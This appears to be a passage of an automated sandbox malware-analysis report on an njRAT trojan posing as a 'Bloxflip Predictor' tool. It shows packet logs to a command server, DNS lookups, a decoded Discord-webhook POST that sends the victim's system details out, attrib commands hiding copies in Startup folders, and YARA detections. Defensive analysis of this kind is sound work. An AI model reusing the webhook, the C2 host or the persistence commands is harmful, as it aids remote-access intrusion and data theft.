                                          Dec 13, 2024 12:34:51.641455889 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:51.761327982 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.761590004 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:51.881511927 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.881791115 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.001701117 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.001794100 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.122898102 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.123220921 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.243243933 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.243365049 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.363415003 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.363718987 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.483603954 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.483681917 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.603943110 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.604163885 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.724467993 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.726298094 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.846208096 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.846306086 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.966768026 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.970388889 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.091279030 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.091634035 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.211605072 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.214447021 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.334547043 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.334908962 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.455209970 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.455310106 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.575198889 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.575304985 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.695146084 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.695250988 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.815032005 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.815104961 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.935005903 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.935339928 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.055232048 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.055427074 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.175375938 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.175694942 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.295557022 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.295651913 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.457432985 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.457528114 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.661429882 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.662614107 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.909449100 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.910429001 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.157484055 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.157937050 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.405467987 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.406730890 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.653460026 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.653719902 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.901590109 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.901820898 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.149432898 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.149715900 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.397595882 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.397855997 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.645518064 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.645746946 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.898848057 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.918087006 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.166477919 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.166769028 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.413422108 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.413573027 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.661875963 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.663862944 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.909645081 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.912295103 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.157532930 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.157650948 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.405544043 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.405713081 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.653491020 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.653748989 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.901572943 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.903331041 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.153480053 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.153908014 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.402312994 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.402915001 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.649451017 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.649777889 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.897502899 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.897974014 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.145524979 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.146117926 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.393543005 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.393886089 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.641489983 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.641697884 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.889470100 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.889565945 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:01.137569904 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:01.137799978 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:01.385524035 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:01.385916948 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:01.633440971 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:01.999078035 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.119426966 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.119695902 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.243792057 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.244579077 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.364479065 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.370024920 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.490919113 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.492621899 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.612693071 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.616839886 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.736829996 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.739339113 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.859802008 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.859903097 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.979885101 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.980294943 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.100281954 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.104310036 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.224256992 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.228462934 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.348401070 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.348650932 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.468489885 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.468780041 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.589966059 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.590152025 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.710093021 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.710278034 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.830964088 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.831337929 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.951464891 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.951772928 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.114140987 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.114260912 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.317487001 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.317693949 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.565529108 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.566292048 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.813450098 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.813558102 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.065526962 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.065706015 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.313514948 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.315335989 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.561454058 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.561609030 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.809493065 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.811191082 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:06.058553934 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:06.059056044 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:06.306658983 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:06.310520887 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:06.442847967 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.451984882 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.571978092 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.572304964 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.575599909 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.695416927 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.695746899 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.816127062 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.818485975 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.938596964 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.944461107 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.064243078 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.064836979 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.188513994 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.188744068 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.308706045 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.320203066 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.442985058 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.443150997 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.563698053 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.572201967 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.692931890 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.693460941 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.813476086 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.813878059 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.936284065 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.940216064 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.060445070 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.060602903 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.180824041 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.181366920 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.301168919 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.301400900 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.421386957 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.421520948 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.541403055 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.543346882 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.663237095 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.664371014 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.784389019 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.788477898 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.908799887 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.911179066 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.031111956 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.031336069 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.158121109 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.158289909 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.278217077 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.278399944 CET4998410397192.168.2.5147.185.221.224
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 12:31:51.341891050 CET | 56982 | 53 | 192.168.2.5 | 1.1.1.1
Dec 13, 2024 12:31:51.480787039 CET | 53 | 56982 | 1.1.1.1 | 192.168.2.5
Dec 13, 2024 12:31:55.745636940 CET | 65104 | 53 | 192.168.2.5 | 1.1.1.1
Dec 13, 2024 12:31:56.001827955 CET | 53 | 65104 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 12:31:51.341891050 CET | 192.168.2.5 | 1.1.1.1 | 0x775f | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:31:55.745636940 CET | 192.168.2.5 | 1.1.1.1 | 0x8032 | Standard query (0) | quite-cs.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 12:31:51.480787039 CET | 1.1.1.1 | 192.168.2.5 | 0x775f | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:31:51.480787039 CET | 1.1.1.1 | 192.168.2.5 | 0x775f | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:31:51.480787039 CET | 1.1.1.1 | 192.168.2.5 | 0x775f | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:31:51.480787039 CET | 1.1.1.1 | 192.168.2.5 | 0x775f | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:31:51.480787039 CET | 1.1.1.1 | 192.168.2.5 | 0x775f | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:31:56.001827955 CET | 1.1.1.1 | 192.168.2.5 | 0x8032 | No error (0) | quite-cs.at.ply.gg | | 147.185.221.224 | A (IP address) | IN (0x0001) | false
                                          • discord.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 162.159.137.232 | 443 | 428 | C:\Windows\Bloxflip Predictor.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-13 11:31:52 UTC | 255 | OUT | POST /api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp HTTP/1.1
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: discord.com
                                          Content-Length: 247
                                          Expect: 100-continue
                                          Connection: Keep-Alive
2024-12-13 11:31:53 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-12-13 11:31:53 UTC | 1 | OUT | Data Raw: 63
                                          Data Ascii: c
2024-12-13 11:31:53 UTC | 246 | OUT | Data Raw: 6f 6e 74 65 6e 74 3d 59 6f 75 2b 68 61 76 65 2b 61 2b 72 75 6e 6e 69 6e 67 2b 63 6f 6d 70 75 74 65 72 2e 2e 2e 25 30 64 25 30 61 69 6e 66 6f 72 6d 61 74 69 6f 6e 2b 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 4e 61 6d 65 2b 2b 2b 25 33 61 2b 61 6c 66 6f 6e 73 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 53 79 73 74 65 6d 2b 25 33 61 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 48 6f 73 74 2b 2b 2b 25 33 61 2b 71 75 69 74 65 2d 63 73 2e 61 74 2e 70 6c 79 2e 67 67 25 30 64 25 30 61 25 35 62 25 32 62 25 35 64 2b 50 6f 72 74 2b 2b 2b 25 33 61 2b 31 30 33 39 37
                                          Data Ascii: ontent=You+have+a+running+computer...%0d%0ainformation+------------------------------%0d%0a%5b%2b%5d+Name+++%3a+user%0d%0a%5b%2b%5d+System+%3a+Microsoft+Windows+10+Pro%0d%0a%5b%2b%5d+Host+++%3a+quite-cs.at.ply.gg%0d%0a%5b%2b%5d+Port+++%3a+10397
2024-12-13 11:31:53 UTC | 1302 | IN | HTTP/1.1 404 Not Found
                                          Date: Fri, 13 Dec 2024 11:31:53 GMT
                                          Content-Type: application/json
                                          Content-Length: 45
                                          Connection: close
                                          Cache-Control: public, max-age=3600, s-maxage=3600
                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                          x-ratelimit-limit: 5
                                          x-ratelimit-remaining: 4
                                          x-ratelimit-reset: 1734089514
                                          x-ratelimit-reset-after: 1
                                          via: 1.1 google
                                          alt-svc: h3=":443"; ma=86400
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9wbsGCU7WkE%2FAtznTqtdQcBmchAp1Y%2Ftal2agipQu6gJShuOgAt6wF1BFedC2mkbQka87vBjO1C3QQhfV%2Bt1BsgOmy2xAsUYAOt%2BfBksRAohlWjfA40K6ZBFZmr"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          X-Content-Type-Options: nosniff
                                          Set-Cookie: __cfruid=d3f28fe7b7367f135ebf22d2ac86ded1e15eb002-1734089513; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                          Set-Cookie: _cfuvid=pnFd6BJ.ITU12cb7tlltd2RqJsrP8UVkk0QdnIVrVG4-1734089513550-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                          Server: cloudflare
                                          CF-RAY: 8f15a160bce84387-EWR
                                          {"message": "Unknown Webhook", "code": 10015}



                                          Target ID:1
                                          Start time:06:31:29
                                          Start date:13/12/2024
                                          Path:C:\Users\user\Desktop\Bloxflip Predictor.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Bloxflip Predictor.exe"
                                          Imagebase:0x510000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:06:31:39
                                          Start date:13/12/2024
                                          Path:C:\Windows\Bloxflip Predictor.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Bloxflip Predictor.exe"
                                          Imagebase:0xbd0000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\Bloxflip Predictor.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Windows\Bloxflip Predictor.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Windows\Bloxflip Predictor.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Windows\Bloxflip Predictor.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Windows\Bloxflip Predictor.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 84%, ReversingLabs
                                          Reputation:low
                                          Has exited:false

                                          Target ID:3
                                          Start time:06:31:39
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\attrib.exe
                                          Wow64 process (32bit):true
                                          Commandline:attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
                                          Imagebase:0x950000
                                          File size:19'456 bytes
                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:4
                                          Start time:06:31:39
                                          Start date:13/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\attrib.exe
                                          Wow64 process (32bit):true
                                          Commandline:attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
                                          Imagebase:0x950000
                                          File size:19'456 bytes
                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:7
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\attrib.exe
                                          Wow64 process (32bit):true
                                          Commandline:attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
                                          Imagebase:0x950000
